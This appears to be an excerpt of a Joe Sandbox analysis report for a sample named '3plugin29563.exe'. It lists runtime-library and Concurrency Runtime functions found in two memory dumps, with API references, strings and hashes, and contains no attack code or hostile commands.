Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a9aacfce53097c8553ae6e4f25fd82020dc2b6b514d4337947e99e9092d3f47b
Instruction ID: 58ba100bc29c3ff1104b063c3d3d35bef3e3b09528de3bde2e517b3314a6c57a
Opcode Fuzzy Hash: a9aacfce53097c8553ae6e4f25fd82020dc2b6b514d4337947e99e9092d3f47b
Instruction Fuzzy Hash: 9DD1BC71D002589FCF15CFA8C8809EEBBB5BF09314F28116AE856B7352D734AD4ACB58

Function 0214FE56 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,02118877,00000000), ref: 0214FE9E
__fassign.LIBCMT ref: 0215007D
__fassign.LIBCMT ref: 0215009A
WriteFile.KERNEL32(?,02118877,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 021500E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 02150122
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 021501CE

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: d81ae7e7ddfce2e99b94c7cab2e13c1e0fd135fc3028c23c2bc8df81f234376b
Instruction ID: fd837402aab2cc35aaa6f46f84a41fe8d2c8b09bf13d271f9ac8ab7964fcf908
Opcode Fuzzy Hash: d81ae7e7ddfce2e99b94c7cab2e13c1e0fd135fc3028c23c2bc8df81f234376b
Instruction Fuzzy Hash: C8D18B75D00258DFCB15CFE8D980AEDBBB5AF4D304F2801AAE865BB241E731A946CB50

Function 0042E87D Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0042E8BE
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8C6
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E8F0
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E8F9
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E97C
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E984

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: e5b7b2fa93d888bd1bb69b7ad52ab2ebb4dcd56ad972735b2165e0d4f688e56b
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: 12418178B00219AFCB09DF65D458A6DB7B1FF48310F40815AE44697391CB38AD41CF85

Function 0213EAE4 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0213EB25
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0213EB2D
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0213EB57
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0213EB60
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0213EBE3
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0213EBEB

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: 3f6d4aceef71e871cd778ee4e5c3d9ce1e7039048b7d1becf4fee6baa7785f12
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: 27413079B40619EFCB1ADF64C854AADB7B6FF48310F048159E416A7790CB34AE01CF85

Function 0041EC86 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0041EC8D
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041ECB7

Part of subcall function 0041F37D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F39A

__alloca_probe_16.LIBCMT ref: 0041ECF3
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041ED34
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041ED66
__freea.LIBCMT ref: 0041ED8C

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 27d199883d6cb73650d5b7cb295f88d9273e2e9d589b9f1ad933b675be6d1c68
Instruction ID: 3fdf1ee7f2a5237a4af83aac541e30dcb98b0e926beb65d7e9949f6dd82b2732
Opcode Fuzzy Hash: 27d199883d6cb73650d5b7cb295f88d9273e2e9d589b9f1ad933b675be6d1c68
Instruction Fuzzy Hash: 3D31B275E001068BCB14DFAAD4415EEB7F5AF09314F24406FE805E7351DB389E82CB99

Function 00429FC6 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A009

Part of subcall function 0042B500: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B54F

GetCurrentThread.KERNEL32 ref: 0042A013
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A01F

Part of subcall function 00420328: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 0042033A

Part of subcall function 004207B4: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 004207BB

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A062

Part of subcall function 0042B4B2: SetEvent.KERNEL32(?,?,0042A067,0042ADFB,00000000,?,00000000,0042ADFB,00000004,0042B4A7,?,00000000,?,?,00000000), ref: 0042B4F6

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A06B

Part of subcall function 0042AAE1: List.LIBCONCRT ref: 0042AB17

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A07B

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 6f0bb924c65a264d2a48e0247f38ddf1cdfb22da9528c274876308f8a210a65a
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 1321DE31A00B209FCB24EF65E9908ABF3F5FF48304740455EE84297651DB38B805CB9A

Function 0213A22D Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0213A270

Part of subcall function 0213B767: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0213B7B6

GetCurrentThread.KERNEL32 ref: 0213A27A
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0213A286

Part of subcall function 0213058F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 021305A1

Part of subcall function 02130A1B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 02130A22

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0213A2C9

Part of subcall function 0213B719: SetEvent.KERNEL32(?,?,0213A2CE,0213B062,00000000,?,00000000,0213B062,00000004,0213B70E,?,00000000,?,?,00000000), ref: 0213B75D

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0213A2D2

Part of subcall function 0213AD48: __EH_prolog3.LIBCMT ref: 0213AD4F
Part of subcall function 0213AD48: List.LIBCONCRT ref: 0213AD7E

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0213A2E2

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 2908504212-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 1645aed35b0d44b28c64e013ade61091b643b67c9d765c76158f0e3543322453
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 8421BA31540B149FCB26EF64D9908AAB3FAFF4C3007004A5EE982A7660DB30F905CBA5

Function 00434ED7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00434ECE,00433A8F,0041B4F5,92861014,?,00000000,0044B2B8,000000FF,?,004023EA,?,?), ref: 00434EE5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00434EF3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00434F0C
SetLastError.KERNEL32(00000000,?,00434ECE,00433A8F,0041B4F5,92861014,?,00000000,0044B2B8,000000FF,?,004023EA,?,?), ref: 00434F5E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 36b25f35af6998ec4b79c880eb4916be4c2907fdd02cbca714a0b9a79087163e
Instruction ID: 04eb12361496795fe93eb106cba69ea63913fe943bbd80409b42dfe48d9cd70b
Opcode Fuzzy Hash: 36b25f35af6998ec4b79c880eb4916be4c2907fdd02cbca714a0b9a79087163e
Instruction Fuzzy Hash: 2801683250D7227DA2242675BC86AA72655EB49378F20223FF238452E0EEC96C01958C

Function 0214513E Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02145135,02143CF6,0212B75C,00462014,?,00000000,0044B2B8,000000FF,?,02112651,?,?), ref: 0214514C
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0214515A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02145173
SetLastError.KERNEL32(00000000,?,02145135,02143CF6,0212B75C,00462014,?,00000000,0044B2B8,000000FF,?,02112651,?,?), ref: 021451C5

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 36b25f35af6998ec4b79c880eb4916be4c2907fdd02cbca714a0b9a79087163e
Instruction ID: 20b3a059908373a318e5c27011de3758d18768dcb9af2b789e382dec7fc72ba6
Opcode Fuzzy Hash: 36b25f35af6998ec4b79c880eb4916be4c2907fdd02cbca714a0b9a79087163e
Instruction Fuzzy Hash: 0201FC3258DB617FA72517B5BC84A1B264BEB12F7D7600239E23C840E0FF924C00D544

Function 0041FBBB Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FBC9
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FBCF
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FBFC
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC06
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FC18
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FC2E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: e97b62398d98c93c3587756cc98682a42a4027764094f964300bb13895813f72
Instruction ID: 2daaeef79064ac77490d1dffd14631307c5eec31a9eed07a5aea8310186e5a8d
Opcode Fuzzy Hash: e97b62398d98c93c3587756cc98682a42a4027764094f964300bb13895813f72
Instruction Fuzzy Hash: D001D835204219A7DB10BB66FC45BEB376CFB40752B14087BF801D1192EB2CE94A97AD

Function 0212FE22 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0212FE30
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0212FE36
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0212FE63
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0212FE6D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0212FE7F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0212FE95

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: e97b62398d98c93c3587756cc98682a42a4027764094f964300bb13895813f72
Instruction ID: c0b256ae106722ef2c7f9938752ed5aa4e2599a88dadf07cd391d3b61728852f
Opcode Fuzzy Hash: e97b62398d98c93c3587756cc98682a42a4027764094f964300bb13895813f72
Instruction Fuzzy Hash: 52014735680224AFD705BB71EC08BAF3778EF40742F310835F809E2092DB28E4198B60

Function 02152889 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 021528F3
_free.LIBCMT ref: 021528E1

Part of subcall function 0214AF8C: HeapFree.KERNEL32(00000000,00000000,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?), ref: 0214AFA2
Part of subcall function 0214AF8C: GetLastError.KERNEL32(?,?,0214F264,?,00000000,?,?,?,0214F28B,?,00000007,?,?,0214F68D,?,?), ref: 0214AFB4

_free.LIBCMT ref: 02152AAD

Strings

XgE, xrefs: 0215289C, 021528A2
XgE, xrefs: 02152A10

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: XgE$XgE
API String ID: 2155170405-1765908331
Opcode ID: b4be35cfaf65d8fa7a0d1c87db151e18c0363e0f38985316fa454ef15cb7fb70
Instruction ID: 7f1dcb26a827eb8f38d8b04670f1532f596dc77d485755429467bcfce8993a46
Opcode Fuzzy Hash: b4be35cfaf65d8fa7a0d1c87db151e18c0363e0f38985316fa454ef15cb7fb70
Instruction Fuzzy Hash: 8751C873940235EFDB14EFA5DC809AEB7B9EF44314B1506EADC74A3290EBB09940CB95

Function 0040DA30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

list too long, xrefs: 0040DEED

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: 4a78f50458fa15542522f081f0e92717ebaa6169c7a8563ae46600c3366d190a
Instruction ID: 633e6634bf23f0c74cc4ad99a5a582d58bd3a263225460208e3560511f7463a3
Opcode Fuzzy Hash: 4a78f50458fa15542522f081f0e92717ebaa6169c7a8563ae46600c3366d190a
Instruction Fuzzy Hash: 2E51DB70D04758ABD710DFA5CC85B9AB3B8EF14304F0041ABF909A7281E774A9858B59

Function 00434DBA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434E0D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434E26
PMDtoOffset.LIBCMT ref: 00434E4C

Strings

Bad dynamic_cast!, xrefs: 00434E8E

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: ec3db8e5036e0479567a171a26d8538989da3d46e370c68e873fe9cc40904e74
Instruction ID: d9cb497ee388f3116797934a4f2a50e520f34126ef8c01ceafd53195fd4abd78
Opcode Fuzzy Hash: ec3db8e5036e0479567a171a26d8538989da3d46e370c68e873fe9cc40904e74
Instruction Fuzzy Hash: 6121E572600205ABCB14DEA4D906AEA77A8FBCC724F24521FF91093280D738FD018799

Function 004317C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431822
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431841
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431888

Strings

pContext, xrefs: 00431839

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: ae07365b94ca23c4650cd0b3605938529dcb011693e7a54dc77f8391084589f6
Instruction ID: 3deb2eace16098ff6ede50feb76c906e8a70dd9436e932e618e6add8288398d3
Opcode Fuzzy Hash: ae07365b94ca23c4650cd0b3605938529dcb011693e7a54dc77f8391084589f6
Instruction Fuzzy Hash: C321F635B006159BCB09BB69D895AAD73A5BF98324F14112BE501872A1CB6CAC42CA9D

Function 0214E17A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\3plugin29563.exe, xrefs: 0214E17F

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\3plugin29563.exe
API String ID: 0-4213326443
Opcode ID: 0a5fcc20f1138a9f2873644ac541eee3e021fdd6f7bae41b37ce764f534e5412
Instruction ID: 346752cd3dba8404d79e096ff86aa763c00bc004ec8a334a9858fe3aadcab4a8
Opcode Fuzzy Hash: 0a5fcc20f1138a9f2873644ac541eee3e021fdd6f7bae41b37ce764f534e5412
Instruction Fuzzy Hash: 4F216F71684205AFDB24AF759C80E6ABBAEFF013647114A15FD2CD7190EF31ED518BA0

Function 00429C35 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00429C3C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429C88
std::bad_exception::bad_exception.LIBCMT ref: 00429C9E
std::bad_exception::bad_exception.LIBCMT ref: 00429D0A

Strings

+TB, xrefs: 00429CB6

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID: +TB
API String ID: 2033596534-2371668223
Opcode ID: 7268a3b9010ee5d87cb6134f16b065780e5d44db2558fef675babd7b93004cfb
Instruction ID: 942b22d20c67b30ec302cc3700c5e19e7cb6abcce14cc269abc7555e372a7174
Opcode Fuzzy Hash: 7268a3b9010ee5d87cb6134f16b065780e5d44db2558fef675babd7b93004cfb
Instruction Fuzzy Hash: 4421B072A00224DFDB04EFA5E58299DB7A4EF05314FA0006FF401AB251EB386E45CB59

Function 00437139 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0043717B

Strings

.bat, xrefs: 004371AA
.com, xrefs: 004371BB
.cmd, xrefs: 00437199
.exe, xrefs: 00437188

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
Instruction ID: 296e56c383619b5e0ec5d7c16895dea9a6b51003625127dc71c558e1c4d4365d
Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
Instruction Fuzzy Hash: 0901CC67608617256A25645A9C427271BD88BCAF74F25601FFDC4F73C6DF8CDC01419C

Function 00424E42 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00424EA1
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00424EC4
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00424F06

Strings

count, xrefs: 00424E5A
ppVirtualProcessorRoots, xrefs: 00424EBC

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 61ec0f762d323d2c39c8cae16ee930de2497f66943da9dcd81bdd7bb4414525c
Instruction ID: 638601bbf1ca3c0ca0b519cd7f0c96d9614760514b606045dbaa781a2b46088f
Opcode Fuzzy Hash: 61ec0f762d323d2c39c8cae16ee930de2497f66943da9dcd81bdd7bb4414525c
Instruction Fuzzy Hash: 9021E034B00225EFCB04EFA9D891EAD77A5FF88304F50406FE90697291DB78AE01CB58

Function 0043A5A1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004368EA,?,?,?,?,0043751E,?), ref: 0043A5A6
_free.LIBCMT ref: 0043A603
_free.LIBCMT ref: 0043A639
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004368EA,?,?,?,?,0043751E,?), ref: 0043A644

Strings

x!F, xrefs: 0043A62C

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction ID: 9c149aa86173fbbd0030d3e0a195d136fb2b955210d307f83871c991f90d2b5a
Opcode Fuzzy Hash: e535b85f6a1f7523708f7efbf604d8e27d0e3fcbfa08d8b8bd71da2eb14a1c01
Instruction Fuzzy Hash: B8110A312847047A961123765C46E6B2159DBC9379F24323FFBA4822D1EFAD8C22525F

Function 0214A808 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,02146B51,?,?,?,?,02147785,?), ref: 0214A80D
_free.LIBCMT ref: 0214A86A
_free.LIBCMT ref: 0214A8A0
SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,02146B51,?,?,?,?,02147785,?), ref: 0214A8AB

Strings

x!F, xrefs: 0214A893

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

